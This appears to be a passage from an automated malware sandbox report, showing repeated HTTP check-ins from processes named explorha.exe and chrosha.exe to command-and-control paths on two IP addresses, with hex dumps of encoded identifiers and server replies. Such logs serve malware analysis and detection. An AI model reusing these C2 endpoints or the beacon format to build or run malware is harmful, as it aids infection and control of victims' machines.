                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      916192.168.2.550766193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:11.550946951 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:11.800662041 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      917192.168.2.550767193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:11.755424976 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.011430025 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      918192.168.2.550768193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.166714907 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.414271116 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      919192.168.2.550769193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.366102934 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.609262943 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      920192.168.2.550770193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.663254023 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.909758091 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      921192.168.2.550771193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:12.859205008 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.108330965 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      922192.168.2.550772193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.269102097 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.510598898 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      923192.168.2.550773193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.475799084 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.720532894 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      924192.168.2.550774193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.761305094 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.013081074 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      925192.168.2.550775193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:13.974232912 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.225613117 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      926192.168.2.550776193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.371309042 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.619168997 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      927192.168.2.550777193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.591427088 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.843400002 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      928192.168.2.550778193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:14.865892887 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.112118959 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      929192.168.2.550779193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.106594086 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.363140106 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      930192.168.2.550780193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.475387096 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.719880104 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      931192.168.2.550781193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.730767965 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.982017040 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:34:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      932192.168.2.550782193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:34:15.975219965 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
